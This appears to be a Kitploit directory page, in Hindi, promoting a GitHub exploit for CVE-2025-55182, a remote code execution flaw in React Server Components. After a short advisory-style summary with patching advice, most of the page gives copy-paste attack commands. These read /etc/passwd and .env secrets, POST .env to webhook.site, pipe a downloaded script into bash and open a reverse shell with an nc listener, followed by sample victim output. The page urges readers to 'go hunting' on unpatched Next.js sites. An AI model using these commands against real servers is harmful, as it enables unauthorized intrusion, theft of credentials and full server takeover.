Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
उपकरण/GitHubGitHub/shen771/blackash-cve-2025-55182
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगरिमोट एक्सेस टूल
GitHubshen771/blackash-cve-2025-55182

Blackash-CVE-2025-55182

3039 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2025-55182

रिपॉजिटरी देखें
साझा करें

🚨 CVE-2025-55182 — गंभीर React सर्वर कमजोरी

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 यह क्या है

  • ⚛️ React सर्वर घटकों (RSC) में एक गंभीर सुरक्षा दोष
  • 🧨 असुरक्षित डिसीरियलाइज़ेशन के कारण
  • 🌐 नेटवर्क अनुरोधों के माध्यम से शोषणीय
  • 🔓 कोई प्रमाणीकरण आवश्यक नहीं
  • ☠️ रिमोट कोड निष्पादन (RCE) का कारण बन सकता है

✅ इसका मतलब है कि हमलावर एक एकल क्राफ्टेड अनुरोध के साथ मनमाना सर्वर-साइड कोड निष्पादित कर सकते हैं।


📊 गंभीरता

  • 🔴 CVSS स्कोर: 10.0 (गंभीर)
  • 🏴‍☠️ हमला जटिलता: कम
  • 🔑 आवश्यक विशेषाधिकार: कोई नहीं
  • 👤 उपयोगकर्ता सहभागिता: कोई नहीं
  • 💥 प्रभाव: पूर्ण सिस्टम समझौता संभव

📦 प्रभावित प्रौद्योगिकियाँ

⚠️ React सर्वर घटकों का उपयोग करने वाले सिस्टम, जिनमें शामिल हैं:

  • ✅ React सर्वर DOM पैकेज

  • ✅ ढाँचे जो RSC को बंडल करते हैं, जैसे:

    • Next.js (ऐप राउटर + RSC)
    • Vite RSC प्लगइन्स
    • Parcel RSC उपकरण
    • Redwood, Waku, आदि
टूल डाउनलोड करें

❌ प्रभावित नहीं:

  • शुद्ध क्लाइंट-साइड React ऐप्स
  • ऐप्स जो सर्वर घटकों का उपयोग नहीं करते

🔥 यह खतरनाक क्यों है

  • 🧑‍💻 हमलावर आपके सर्वर पर कमांड चला सकते हैं
  • 🗃️ डेटाबेस और रहस्य चुराने की क्षमता
  • 🦠 रैनसमवेयर या बैकडोर तैनात करने के लिए इस्तेमाल किया जा सकता है
  • 🔄 बुनियादी ढांचे में पार्श्व गति की अनुमति दे सकता है
  • 🚀 बड़े पैमाने पर शोषणीय

🛠️ तुरंत क्या करें

✅ 1. पैच और अपग्रेड

  • ⬆️ React को पैच किए गए संस्करणों में अपडेट करें
  • ⬆️ Next.js या किसी भी RSC-आधारित ढाँचे को अपडेट करें

✅ 2. निर्भरता ऑडिट

  • 🔍 संक्रामक कमजोर पैकेजों के लिए स्कैन करें

  • 🧾 उपयोग करें:

    • npm audit
    • pnpm audit
    • yarn audit

✅ 3. अस्थायी सुरक्षा (पूर्ण समाधान नहीं)

  • 🛡️ WAF नियम
  • 🔐 अनुरोध सत्यापन फ़िल्टर
  • 🚫 संदिग्ध पेलोड को ब्लॉक करें

⚠️ ये केवल जोखिम कम करते हैं — ये पैचिंग को प्रतिस्थापित नहीं करते


👥 किसे चिंतित होना चाहिए?

  • ✅ Next.js ऐप राउटर का उपयोग करने वाले फुल-स्टैक डेवलपर्स

  • ✅ React SSR ऐप्स होस्ट करने वाली DevOps टीमें

  • ✅ सुरक्षा इंजीनियर निगरानी कर रहे हैं:

    • Node.js वेब सेवाएँ
    • एज रनटाइम
    • सर्वरलेस SSR ऐप्स

📌 मुख्य निष्कर्ष

🚨 यदि आपका ऐप React सर्वर घटकों का उपयोग करता है और पैच नहीं किया गया है — तो यह संभावित रूप से अभी पूरी तरह से समझौता किया गया है।


🚨 यहां वे सभी त्वरित वन-लाइनर हैं जिनकी आपको कभी आवश्यकता होगी (कॉपी-पेस्ट → तत्काल परिणाम):

CVE-2025-55182.py (मूल RCE)

root@kitploit:~
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"

# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"

# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"

# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"

CVE-2025-55182-revshell.py (तत्काल रिवर्स शेल)

root@kitploit:~
# 1. Start listener (once)
nc -lvnp 4444

# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444

यह सचमुच बस इतना ही है।
दो स्क्रिप्ट, ये 8 कमांड → आज किसी भी अनपैच किए गए Next.js साइट पर पूर्ण समझौता।
जाओ और वे बाउंटी प्राप्त करो।

यहाँ वास्तव में वही है जो आप वास्तविक समय में देखेंगे जब एक्सप्लॉइट काम करता है (100% अनपैच किया गया लक्ष्य, 3 दिसंबर 2025):

1. जब आप सामान्य RCE स्क्रिप्ट (CVE-2025-55182.py) चलाते हैं
आप टाइप करते हैं:

root@kitploit:~
./CVE-2025-55182.py https://target.com "whoami"

आप तुरंत अपनी स्क्रीन पर देखते हैं:

root@kitploit:~
[+] CVE-2025-55182 Exploit
[+] Target  : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node

→ वह “node” (या जो भी कमांड लौटाता है) पीड़ित सर्वर का वास्तविक आउटपुट है।
यदि आप id चलाते हैं तो आप पूर्ण uid/gid लाइनें आदि देखेंगे।

2. जब आप रिवर्स-शेल स्क्रिप्ट (CVE-2025-55182-revshell.py) चलाते हैं
आप टाइप करते हैं:

root@kitploit:~
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444

आप तुरंत अपने लिसनर टर्मिनल पर देखते हैं:

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node   420 Dec  3 11:11 .env
...

→ पूर्ण इंटरैक्टिव TTY शेल node उपयोगकर्ता के रूप में (लगभग हमेशा वेब ऐप उपयोगकर्ता)। आप बॉक्स के मालिक हैं।

यह सचमुच बस इतना ही है।
यदि आप उपरोक्त में से कुछ भी देखते हैं → एक्सप्लॉइट 100% काम किया।
यदि आपको केवल HTTP 403/404 मिलता है या कुछ नहीं → पहले से पैच किया गया या WAF ने ब्लॉक किया।

शिकार पर जाओ।


अस्वीकरण

यह PoC केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए है।
इसे किसी भी ऐसे सिस्टम पर न चलाएं जो आपका नहीं है या जिसके परीक्षण की आपके पास स्पष्ट लिखित अनुमति नहीं है।
अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप आपराधिक मुकदमा चलाया जा सकता है।
केवल अपनी प्रयोगशाला, स्पष्ट दायरे वाले बग-बाउंटी कार्यक्रमों, या उन लक्ष्यों पर उपयोग करें जिन्होंने आपको अनुमति दी है।

आप अपने कार्यों के लिए 100% जिम्मेदार हैं।